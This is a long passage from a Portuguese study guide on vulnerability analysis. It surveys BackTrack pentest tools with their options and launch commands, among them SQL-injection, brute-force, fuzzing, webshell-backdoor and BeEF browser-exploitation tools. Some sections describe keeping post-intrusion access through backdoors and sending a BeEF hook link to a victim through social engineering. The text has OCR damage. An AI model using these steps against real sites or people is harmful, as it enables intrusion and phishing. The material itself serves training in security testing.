...............................................................................................................
-S Use HTTPS ao invs de HTTP
-T Personalizao de consulta (o padro GET)
-U Personalizao de consulta URL (o padro /)
-H Definio do cabealho para a solicitao (pode ser usado vrias
vezes)
exemplos: Keep-Alive: 300, User-Agent: httsquash
existem tambm as opes adicionais para scripts.

Aqui um exemplo de como para utilizar o httsquash.


#./httsquash - www.adonelbezerra.com.br
netifera
O Netifera um scaner de portas e servios um pouco diferente
e desconhecido para o pblico em geral. Ele pode ser usado em
qualquer distribuio Linux conhecida, mais no s um scanner, ele
serve tambm como sniffer.
Digite na console ./netifera de dentro de seu diretrio e desfrute-o.

www.clubedohacker.com.br

382

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Como ele carrega uma interface grfica, fica tudo intuitivo, muito fcil
de usar mesmo.
Protocolo SCTP
O protocolo SCTP um protocolo de transporte confivel que
opera sobre um servio de pacotes no confivel e sem conexo, da
mesma forma que o IP. O SCTP oferece a transferncia de
datagramas livre de erros e de duplicaes atravs do reconhecimento
de transmisses (ACKs).

www.clubedohacker.com.br

383

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
A deteco de erros, perda e duplicao de dados obtida
atravs de bons mecanismos de checksum e nmeros sequenciais. Um
mecanismo de retransmisso seletiva usado para corrigir a perda ou
a corrupo de dados.
Aplicabilidade: O SCTP foi projetado como um protocolo de
transporte de uso geral para aplicaes orientadas a mensagens. A
definio desse protocolo foi feita pelo grupo de trabalho SIGTRAN
http://datatracker.ietf.org/wg/sigtran/charter/) do IETF, que culminou
na emisso de um documento de padronizao do SCTP "RFC2960"
Disponvel em: http://www.ietf.org/rfc/rfc2960.txt. O projeto desse
protocolo incluiu a preveno de congestionamento e a resistncia a
ataques do tipo flooding.
Uma das grandes motivaes para o desenvolvimento do SCTP
foi as limitaes do TCP para transportar sinalizao PSTN sobre
redes IP.
Aps atualizao a RFC2960 passou a ser chamada por
"RFC3309" e est disponvel em: http://www.ietf.org/rfc/rfc3309.txt.
A partir dessa atualizao o mecanismo de checksum do tipo
Adler-32 foi substitudo por um CRC-32c. j que o Adler-32 no era
eficiente o bastante para as novas exigncias.

www.clubedohacker.com.br

384

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Em setembro de 2007 foi publicada uma outra RFC, a RFC4960,
que substituiu as RFC2960 e a RFC3309. Essa nova trouxe vrias
alteraes e est disponvel em: http://www.ietf.org/rfc/rfc4460.txt.

Streams TCP e SCTP: Apesar do TCP ter sido bastante usado


para a transferncia confivel de dados sobre redes IP, um nmero
crescente de aplicaes passaram a ser implementadas com seus
prprios mecanismos para a transferncia confivel de dados sobre o
UDP.
Entre os grande motivos para isso esto
O TCP oferece a transferncia confivel de dados e uma
ordenao estrita na entrega dos dados. Mais algumas aplicaes
necessitam apenas da transferncia confivel sem ordenao enquanto

www.clubedohacker.com.br

385

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
que outras podem usar ordenao parcial. Em ambos os casos, o TCP
est sujeito ao bloqueio do tipo head-of-line, o que causa atrasos
desnecessrios na comunicao.
A natureza dos streams TCP pode ser inconveniente, uma vez
que as aplicaes devem aplicar seus prprios delimitadores de
registro. Alm disso, as aplicaes devem forar o envio final das
mensagens (push) por questes de garantia de entrega e evitar
repeties.
O TCP s capaz de transferir um stream por conexo, dessa
forma se tiver vrios streams para transferir tero que ser feitas vrias
conexes. Isso dificulta bastante na hora de implementar. J o SCTP
capaz de transferir mltiplos streams em uma nica mensagem.
para finalizar, o TCP bastante vulnervel a ataques do tipo
DoS "denial-of-service".
O backtrack traz um scanner especial para teste desse tipo de
aplicao:

www.clubedohacker.com.br

386

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
O Sctpscan.

Ele est dentro do diretrio pentest/scanners/sctpscan


root@bt:/pentest/scanners/sctpscan# ./sctpscan
Opes:
-P, --Port (padro: 10000) Especifca o nmero da porta remota.
-P, --loc_port <port> (padro: 10000) Especifca o nmero de porta
local.
-L, - <loc_host> loc_host (padro: 127.0.0.1) Especifca o host
(bind) local para o SCTP corrente com nmero de porta local sendo
opcional.
-R, --rem_host <rem_host> (padro: 127.0.0.2) Especifca o endereo
(sendto) remoto para o SCTP corrente com nmero de porta remoto
sendo opcional.

www.clubedohacker.com.br

387

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
-S - scan-r aaa [.. Bbb [ccc]] Escanear todas as mquinas dentro da
rede.
-M --mapa:
((mapear todas as portas de 0 a 65535 SCTP 0-65535)
(portscan)
-F - Frequent: Ecanneamento das portas usadas com freqncia
SCTP.
Ex: Portas mais freqentes SCTP: 1, 7, 9, 20, 21, 22, 80, 100, 128, 179,
260, 250, 443, 1167, 1812, 2097, 2000, 2001, 2010, 2011, 2020, 2021,
2100, 2110, 2120, 2225, 2427, 2477, 2577, 2904, 2905, 2906, 2907,
2908, 2909, 2944, 2945, 3000, 3097, 3565, 3740, 3863, 3864, 3868,
4000, 4739, 4740, 5000, 5001, 5060, 5061, 5090, 5091, 5672, 5675,
6000, 6100, 6110, 6120, 6130, 6140, 6150, 6160, 6170, 6180, 6190,
6529, 6700, 6701, 6702, 6789, 6790, 7000, 7001, 7102, 7103, 7105,
7551, 7626, 7701, 7800, 8000, 8001, 8471, 8787, 9006, 9084, 9899,
9911, 9900, 9901, 9902, 10000, 10001, 11146, 11997, 11998, 11999,
12205, 12235, 13000, 13001, 14000, 14001, 20049, 29118, 29168,
30000, 32905, 32931, 32768
-A - autoportscan: Ecanneamento de portas automaticamente em
qualquer host.
-I - LineIn: Receber o IP para escanear a partir de stdin.
-F - fuzz: Testar toda a pilha de protocolo remoto.
-B - bothpackets: Enviar pacotes com fragmento INIT para um, e
SHUTDOWN_ACK para o outro.
-B - both_checksum: Enviar checksum tanto crc32 novo como e
antigo.
-C - crc32: Calcular a soma com o novo crc32.
-A - Adler32: Calcular soma com o Adler32.
-Z - zombie: No h relatrio (Aconselho que voc pesquise em
laboratrio).
-D - dummyserver: Inicia um servidor SCTP de amostra na porta
10000. (Voc pode ento tentar escanear-lo a partir de outra mquina).
-E - <script_name> exec: Executa <script_name> Cada vez que uma
porta SCTP aberta for encontrada.

www.clubedohacker.com.br

388

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Argumentos para execuo de scripts: <script_name> host_ip


sctp_port
-T - tcpbridge: <listen port> TCP Pontes de ligao de todos <listen
port> TCP para o SCTP remoto com a porta designada.
-S - fluxos: <nmero de streams> Tentar estabelecer associao
SCTP com o <nmero especificado de streams> para o destino remoto
e com o SCTP designado.
Alguns exemplos prticos
Escaneamento da porta 9999 em 192.168.1.24
. / Sctpscan -l -r 192.168.1.2 192.168.1.24-p 9999
Verificar disponibilidade de SCTP em 172.17.8. * E escanear
portas em qualquer host.
. / Sctpscan -s -l 172.22.1.96 -r 172.17.8
Verifica portas usadas freqentemente em 172.17.8. *
. / Sctpscan-s-f-l-r 172.22.1.96 172.17.8
Varre toda a rede de classe B para a porta freqente
. / Sctpscan -s -F -r 172,22 -l `ifconfig eth0 | grep" inet addr: "| cut-d:f2 | cut-d ''-f 1`
Final de verificao simples para terminar na mquina local:
. / Sctpscan-d &
. / Sctpscan-s-l-r 192.168.1.24 192.168.1-p 10.000
Observao: Esta ferramenta no funciona corretamente
atravs de NAT. Isso significa que no funcionarar na maioria dos
roteadores e firewall. Voc deve usar esta ferramenta a partir de um
computador que tenha um endereo IP pblico. " Leia RFC1918"

www.clubedohacker.com.br

389

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
testssl.sh
O testssl.sh uma ferramenta de linha de comando Unix e ja
vem no backtrar, ela til pra testar falhas em SSL na verso SSL 2.
Projetado para ser de facil utilizao, ele trabalha sobre uma shell em
qualquer distribuio Linux que tenha openssl instalado.

#./testssl.sh

www.clubedohacker.com.br

390

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

#./testssl.sh -a www.adonelbezerra.com.br
Aqui estou fazendo um teste em um dos meus sites
www.adonelbezerra.com.br
hexinject
O hexinject um analisador de trfego de rede parecido com o
Wireshark, tcpdump e ou scap.

www.clubedohacker.com.br

391

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Ele pode ser usado para injeo de pacotes e sniffer em linha de
comando, o manual autoexplicativo com muitas dicas.

Comando inicail: #hexinject <mode> <opes>


Opes para o comando:
-s modo farejar.
-p modo injetar.
-r modo bruto (em vez do modo hexadecimal padro).
-i dispositivo: dispositivo de rede que voce deseja usar.
-f filtro: filtro personalizado pcap.
-c Nmero de pacotes para capturar
-t tempo de espera em microssegundos (padro 100)

www.clubedohacker.com.br

392

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Opes de injeo:
-C desativar verificao automtica de pacotes.
-S desativar tamanho do pacote automtico.
Opes de interface:
-P desativar o modo promscuo.
-M colocar a interface wireless em modo monitor esse metodo ainda
experimental: Por isso eu aconselho que voc use o airmon-ng que
j est consolidado.
Modo de converso:
-x Converter a entrada hexstring
-y Converter a entrada hexstring o produto
Modo de impresso e desmontagem opes:
-D Permitem desmontar o pacote na tela.
-L Exibe um pacote de exemplo (requer o tipo de pacote: TCP,
UDP, ICMP ou ARP)

www.clubedohacker.com.br

393

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Outras opes: -h tela de ajuda

#./hexinject -s eth0
Aqui o comando mais simples de todos para manipulao do
hexinject. De acordo com as orientaes e descries dos comandos
voc saber utilizar esse sniffer com maestria.
tcpreplay
O tcpreplay uma ferramenta para analise de trfego de rede
em arquivos salvos com o tcpdump ou outras ferramentas que
escrevem no mesmo formato pcap.

www.clubedohacker.com.br

394

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Utilizao fcil: tcpreplay [- <status> [<val>] | - <nome> [{= |}


<val>]] ..
Algumas opes de linha de comando.
-P, - pid exibir o PID do tcpreplay na inicializao
-V, - version para imprimir a verso

www.clubedohacker.com.br

395

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
-H, - help informaes sobre o uso de exibio e sada

Um exemplo simples de utilizao na linha de comandos.


root @ bt : /pentest /sniffers / tcpreplay
Diretrio web: Dentro do Backtrack voc encontrar o diretrio web,
nele que se encontram todas as ferramentas disponveis
exclusivamente para testes em aplicaes web e passarei a demonstrar

www.clubedohacker.com.br

396

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
o funcionamento de algumas dentre as principais.

Dentro desse diretrio tem atualmente algumas dezenas de


ferramentas: vamos conhec-las.
Asp-auditor
Ideal para se fazer auditoria inicial em sistemas feitos em ASP

www.clubedohacker.com.br

397

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Ele mostra informaes como, o caminho do diretrio padro do site,


verso do servidor e verso dos servios em execuo. O comando
bsico bem simples; ./asp-audit.pl + alvo
DarkmySqli
O Darkmysqli um script feito em python para mltiplos
propsitos. Seu objetivo principal a injeo em bando de dados
MYSQL. Esta ferramenta permite a um invasor explorar um erro SQL
atravs de injeo e explorao de aplicaes web.

www.clubedohacker.com.br

398

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Antes de utiliz-lo voc deve entender que o darkmysqli uma
ferramenta de explorao de vulnerabilidades, ou seja, serve para
fazer a prova de conceito "invaso", por isso deve-se a principio
encontrar uma vulnerabilidade em uma aplicao web. Para esse
propsito existem vrias ferramentas disponveis e ns mostraremos
nessa obra.
#python ./DarkMySQLi.py - u http://www.site alvo.xom.br/caminho

Voc pode aprender mais se utilizar o comando help para conhecer as


opes de linha de comando.

www.clubedohacker.com.br

399

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Joomscan
O Joomscan um scanner de vulnerabilidades para o CMS
Joomla. Ele detecta incluso de arquivos e injeo de SQL. Foi
desenvolvido em Perl e j esta disponvel no backtrack. A utilizao
bem simples e pode detectar mais de 600 falhas em CMS Joomla.
#./joomscan.pl + site alvo

www.clubedohacker.com.br

400

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Continuao da sada

Plecost
O plecost uma ferramenta para explorao em sites feitos com o
CMS Wordpress, ele recupera informaes sobre os plugins
instalados e suas verses. Ele pode tambem analisar uma nica URL
ou realizar anlise com base nos resultados indexados pelo Google.

www.clubedohacker.com.br

401

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
# python ./plecost_versao_disponvel.py

Utilize o comando python ./plecost_versao_disponvel.py para


aparecer a tela com todas as opes de comando em Shell
Sintaxe: ./plecost-0.2.2-9-beta.py [opes [ URL | [-l num] -G]
Opes de busca no Google:
-l num: Limitar nmero de resultados para cada plugin no google
-G: modo de pesquisa Google
opes:
-n: Nmero de plugins para usar (Padro usar mais do que 7000)
-c: Verifique plugins apenas com CVE associado

www.clubedohacker.com.br

402

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
-R Arquivo: Lista de plugins reload, utilizaes n-opo para
controlar o tamanho
-o Arquivo: Arquivo de sada. ("Output.txt" Default)
-i Arquivo: Lista de plugins de entrada (O programa deve estar
iniciado)
-s Tempo: Menor tempo de espera entre duas buscas "Tempo em
segundos" (10)
M-Tempo: Maior tempo de espera entre duas buscas "Tempo em
segundos" (20)
-t num: Nmero de threads. (O padro 1)
Untidy
#python ./untidy.py + site alvo

www.clubedohacker.com.br

403

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
O Untidy um fuzzer XML de propsito geral, basta uma string
XML como entrada. No existe muita documentao oficial sobre ele,
mas o resultando muito interessante, vale a pena levar pro
laboratrio e testar todas as suas funcionalidades por umas 20 horas.
WebSlayer
O WebSlayer uma ferramenta desenhada para ataques de fora
bruta em aplicativos Web, ele pode ser usado para encontrar recursos
no vinculados, como diretrios, servlets, scripts, arquivos, etc. Faz
fora bruta em parmetros GET, POST, Formulrios e parmetros de
usuario/senha.

www.clubedohacker.com.br

404

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

#./WebSlayer.py

Essa a tela inicial dentro do diretrio e voc pode execut-lo com o


comando ./WebSlayer.py

www.clubedohacker.com.br

405

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Voc pode executa-lo em ataques, como: Predictable Resource


Locator, Discovery, injeo (XSS, SQL) fora bruta na autenticao
e muito mais. Por executar em uma "GUI" voc no ter nenhuma
dificuldade em fazer suas analises utilizando essa ferraemnta.

Diretrio backdoors: No diretrio backdoors voce encontrar as


ferramentas necessarias para estudar e testar o conceito de portas dos
fundos "backdoors"
Algumas backdoors j vem instaladas e prontas para uso no backtrack
tambm, uma dessas ferramentas a webshells.

www.clubedohacker.com.br

406

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Aqui algumas backdoors para serem utilizadas ps invaso. Isso far


com que voc mantenha o acesso caso deseje retornar ao alvo.

www.clubedohacker.com.br

407

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Dentro do diretrio asp voc pode dar um cat em um dos cdigos
prontos. No caso da tela acima pode-se ver parte do cdigo fonte de
uma backdoor para ASP.
DirBuster
Voc pode descobrir todos os diretrios de um site, apenas com esses
arquivos dentro do diretrio dirbuster. O DirBuster uma aplicao
feita em Java para descobrir nomes de diretrios e arquivos em um
site ou servidor. Para essa tarefa ele usa ataques de fora bruta e
busca por algum diretrio especfico.

www.clubedohacker.com.br

408

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
O DirBuster traz consigo um total de 09 arquivos com aplicaes
diferentes, isso o torna muito eficaz na busca dos arquivos e diretrios
ocultos.

Para rodar o programa voc deve digitar apenas #java -jar DirBuster0.12.jar -u
Em target URL voc digita a url mais a porta onde o servio est
escutando.
Aps isso voc clica em browser e escolhe um do arquivos existente no
diretrio para determinar o tipo de analise que voc deseja fazer e s
clicar em start para o programa comear a rodar.

www.clubedohacker.com.br

409

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Aqui nessa tela voc j ver as coisas acontecendo, o DirBuster j est


listando todo o contedo do site.
Essa aplicao oferece muitos recursos como: Multi-threaded com
mais de 6 mil solicitaes por segundo, Analise de sites em HTTP e
HTTPS, Podem ser adicionados, Cabealhos personalizados, Suporte a
Proxy, Suporte a NTLM auth e muito mais.
Vale muito a pena levar essa aplicao para o laboratrio e testar todas
as suas funcionalidades.
OWASP Mantra
O Mantra um navegador Livre e Open Source baseado
estrutura de segurana, uma coleo de ferramentas livres e de cdigo
aberto integrados em um navegador web que pode ser muito teis para

www.clubedohacker.com.br

410

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
analistas de segurana, desenvolvedores de aplicaes web e
profissionais de segurana que podem encontrar nele um grande aliado
na analise antes de liberar suas aplicaes para ambiente de produo.
#./OWASP\ Mantra

O comando para abrir o navegador bem simples: #./OWASP\


Mantra
Muitoflexvel, porttil e fcil de usar com uma interface grfica
agradvel. Voc pode carreg-lo em cartes de memria, pen drives,
CD / DVDs.

www.clubedohacker.com.br

411

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Pode ser executado nativamente no Linux, Windows e Mac. Tambm


pode ser instalado em seu sistema em poucos minutos.
Com ele voc pode analisar brechas de XSS e muito mais.

www.clubedohacker.com.br

412

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

O Mantra OWASP uma estrutura de analise de segurana


construdo em cima de um navegador e trabalha com todos os
navegadores. Esse um tipo de conjunto que vale a penas voc passar
umas 50 horas no laboratrio para explorar todos as suas
funcionalizades. O mais interessante que pode ser usado tanto para
ataques quanto para defesa.

www.clubedohacker.com.br

413

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Basta digitar #./OWASP\ Mantra de dentro do seu diretrio e


navegar por esse fabuloso mecanismo de estudo.
Powerfuzzer
Fuzzing uma tcnica automatizada para testes de software e
visa prover dados invlidos, inesperados e aleatrios como entradas
para programas de computador.
A partir dessas entradas, pode-se monitorar o programa, analisando as
excees como erros em tempo de execuo etc. Essa tcnica

www.clubedohacker.com.br

414

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
bastante utilizada para testar problemas de segurana em sistemas
computacionais.
O termo fuzzing ou fuzz originrio de um projeto apresentado
pelo professor Barton Miller da Universidade de Wisconsin em 1988.
E foi denominado de programa de confiabilidade de utilitrio em
sistemas operacionais. Desse projeto surgiu um fuzzer baseado em
linha de comando para testar a confiabilidade de programas Unix. O
objetivo principal do projeto era bombardear o sistema com dados
aleatrios at eles apresentarem um erro em tempo de execuo.
Existem dois tipos de programas fuzzing: Os baseados em
mutao e baseados em gerao, que podem ser empregados como
testes de caixa branca, cinza e ou preta.
Os maiores alvos para este tipo de teste so os formatos de
arquivos e protocolos de rede, mais qualquer tipo de entrada, como
variveis de ambiente, contedo de banco de dados, memria
compartilhada ou trocas entre threads, eventos de teclado e mouse e
at mesmo chamadas de API pode servir de alvo.

Trabalhando com o Powerfuzzer

www.clubedohacker.com.br

415

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

#./powerfuzzer.py

Para execut-lo basta digitar # ./powerfuzzer.py


O Powerfuzzer um difusor web automatizado e personalizvel.
Baseia-se no protocolo HTTP e projetado para ser bastante amigvel,
ele consegue dar conta do recado com a efieciencia que se espera de
um bom fuzzer. O Powerfuzzer capaz de identificar problemas como:
- Cross Site Scripting (XSS)
- Injees (SQL, LDAP e muito mais.
Essa maravilha foi projetada para ser modular e expansvel.

www.clubedohacker.com.br

416

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Essa a tela inicial do Powerfuzzer e deve ser carregada logo aps o


comando ./powerfuzzer em linha de comandos no diretrio
#/pentest/web/powerfuzzer/
A partir daqui voc vai escolher as configuraes de acordo
com suas pretenes. Nao ha grandes dificuldades devido sua "GUI"
limpa e pouquissimas opes de configurao, apenas proxy,
credenciais url alvo etc.

www.clubedohacker.com.br

417

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Configurando um proxy no Powerfuzzer


A: defina o alvo e a porta no 192.xxx.xx.xx:2000 no exemplo temos
IP e porta do alvo. Se desejar voc pode habilitar o suporte a HTTPS,
bastando para isso, digitar a URL usando https:// ao invs de http.

A definio de cookies vem disponvel como padro na verso


paga do powerfuzzer, j na verso beta voc ter que apontar para um
arquivo externo.

www.clubedohacker.com.br

418

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Pode-se tambm instruir o Powerfuzzer para pular a pgina de
logout e tambem excluir alguma url ou mesmo diretorios dentro do
alvo. Basta apontar em Excluir URLs) ou dir ou mesmo uma seo
inteira. Bastando para isso voc apontar para as urls corretas que
deseja excluir.

W3af
O w3af um framework para auditoria web em background, ele
chamado de, o metasploit para aplicaes web.

# ./w3af

www.clubedohacker.com.br

419

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
O w3af um scanner de aplicao web de cdigo fonte aberto.
Ele vem com muitos plugins que so divididos em auditoria, ataque,
explorao, descoberta, evaso, fora bruta e outros. O cdigo fonte
muito bem comentado e foi escrito em python.
Para utilizar o w3af em linha de comandos bem simples e no modo
grafico mais ainda. Vamos mostrar algumas opes.
# ./w3af > iniciar o w3af.
#.python ./w3af_console

w3af >>> help > Chame a ajuda para os comandos de utilizao.

www.clubedohacker.com.br

420

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Na tela de ajuda pode-se encontrar todas opes necessrias


para se trabalhar em linha de comando.
Mas ele trs uma GUI que muito mais simples de se trabalhar. Basta

www.clubedohacker.com.br

421

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
digitar #python ./w3af_gui

Aps o comando #python ./w3af_gui precione enter que ser


carregado o w3af em modo grfico.

www.clubedohacker.com.br

422

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Checando se tem nova verso.

www.clubedohacker.com.br

423

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Antes de iniciar os testes em aplicaes web voc deve
selecionar o alvo e os plugins necessrios de acordo com sua
necessidade.
Para qualquer aplicao web que voc for testar, ir necessitar
ao menos de trs plugins configurados. Auditoria, descoberta e
produo. Tudo muito simples. Depois s clicar em start e aguardar
o resultado final. Uma grande vantagem que de dentro dele voc
pode utilizar outro scripts como o nikto por exemplo.

www.clubedohacker.com.br

424

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Voc pode acompanhar o andamento em tempo real se desejar, pois
ele vai exibindo todas as descobertas que fizer.

No tenha pressa, pois ao final voc ter um excelente relatrio de sua


auditoria na aplicao web testada.
Grendel scan
O Grendel-Scan uma ferramenta open source para testes de
segurana em aplicaes web. El possui vrios mdulo de testes
automatizados para a deteco de vulnerabilidades comuns de

www.clubedohacker.com.br

425

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
aplicativos escritos para Web e ir ajud-lo em testes de invaso em
todas as formas, principalmente manuais.
#./grendel.sh

www.clubedohacker.com.br

426

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Para execut-lo basta digitar #./grendel.sh de dentro do diretrio
#/pentest/web/grendel-scan

Muito simples de usar, basta adicionar a url e algumas opes bsicas.


Depois s escolher os tipos de teses que deseja selecionar e pronto!
Observao: Evite utilizar urls absolutas.

www.clubedohacker.com.br

427

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Marque os testes que deseja realizar no alvo e inicie os testes, ai s


aguardar o relatrio final.
Beef
O beef uma ferramenta ideal para explorao de
vulnerabilidades em Browsers. Ele modular e j existem modulos
para varredura de portas, keyloging e roubo de area de transferencia
"clipboard" com ele pode-se lanar vrus, cross-site scripting e muito
mais. As preocupaes com as aplicaes web tem almentado a cada
dia e nessas preocupaes incluem-se os dispositivos mveis. Essa
ferramenta ir permitir que um analista de vulnerabilidades possa

www.clubedohacker.com.br

428

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
avaliar o nvel de segurana real de um ambiente por meio da tcnica
de ataque do lado do cliente.
Ao contrrio de outras estruturas de testes de segurana, o beef
consegue enxergar muito alm do permetro da rede. Uma das
possibilidades dele a capacidade de se simular um honeypot como
um access point por exemplo.
O projeto do beef pode ser encontrado, assim como sua
documentao em https://github.com/beefproject/beef
#./beef

Ele requer instalao, portanto, de dentro do diretrio voc deve


digitar ruby install antes de utiliz-lo.

www.clubedohacker.com.br

429

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

www.clubedohacker.com.br

430

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Em seguida, copie a URL no navegador (Essa a minha URL


baseada no IP da minha mquina virtual)
http://192.168.0.20:3000/ui/panel (O nome do usurio e senha beef)

www.clubedohacker.com.br

431

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Envie o link http:// 192.168.0.20:3000/demos/basic.html para a vtima


atravs de chat ou e-mail ou qualquer tcnica de engenharia social

www.clubedohacker.com.br

432

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

O painel de controle do beef dividido e composto de trs


partes bsicas:

www.clubedohacker.com.br

433

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

www.clubedohacker.com.br

434

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
BurpSuite
O Burp Suite uma plataforma integrada para a realizao de
testes de segurana de aplicaes web. Suas vrias ferramentas
funcionam perfeitamente em conjunto para apoiar o processo de um
teste inteiro, desde o mapeamento inicial e anlise de superfcie de um
aplicativo, at encontrar e explorar vulnerabilidades de segurana.
Ele muito fcil de usar e intuitivo, permitindo que usurios
novatos possa utiliz-lo com facilidade. Tambm configurvel e
contm vrios recursos para auxili-lo nos testes.
Para incici-lo voc digita apenas #java -jar burpsuite_vx.x.xx, o
"V" e o "X" aqui refere-se a verso.

www.clubedohacker.com.br

435

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
O Burp lhe permite total controle e voc pode combinar tcnicas
avanadas, para tornar seu trabalho mais rpido e agradvel.

Como pode-se observar, ele contm vrios componentes-chave:


Como um proxy que ir interceptar e permitir a voc inspecionar, bem
como modificar o trfego entre o navegador e o aplicativo de destino.

www.clubedohacker.com.br

436

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Um scanner web de aplicao avanada para automatizar a


deteco de vrios tipos de vulnerabilidade.
Uma ferramenta de intruso para realizar vrios ataques
personalizados para encontrar e explorar vulnerabilidades incomuns.
Uma ferramenta para manipular e reenviar solicitaes individuais.
Uma ferramenta para testar a aleatoriedade de tokens de sesso
com capacidade de salvar parte de um trabalho e continuar
trabalhando posteriormente.
Sua capacidade de expanso permite que voc escreva seus
prprios plugins para executar tarefas complexas e personalizada,
esse burp algo que vale muito a pena levar pro laboratrio e passar

www.clubedohacker.com.br

437

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
umas 18 horas explorando todas as suas potencialidades.

Blindelephant
O BlindElephant uma ferramenta para fingerprinter, seu
objetivo tentar descobrir a verso de um aplicativo web traando
comparativos entre arquivos estticos em locais conhecidos contra
hashes pr-computadas para as verses desses arquivos em todas as
verses disponveis. A tcnica rpida e usa pouca largura de banda.
No invasivo e altamente customizvel.
A documentao completa pode ser encontrada na pgina web
do projeto em: https://sourceforge.net/projects/blindelephant/
Sua instalao muito simples: #python setup.py install

www.clubedohacker.com.br

438

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
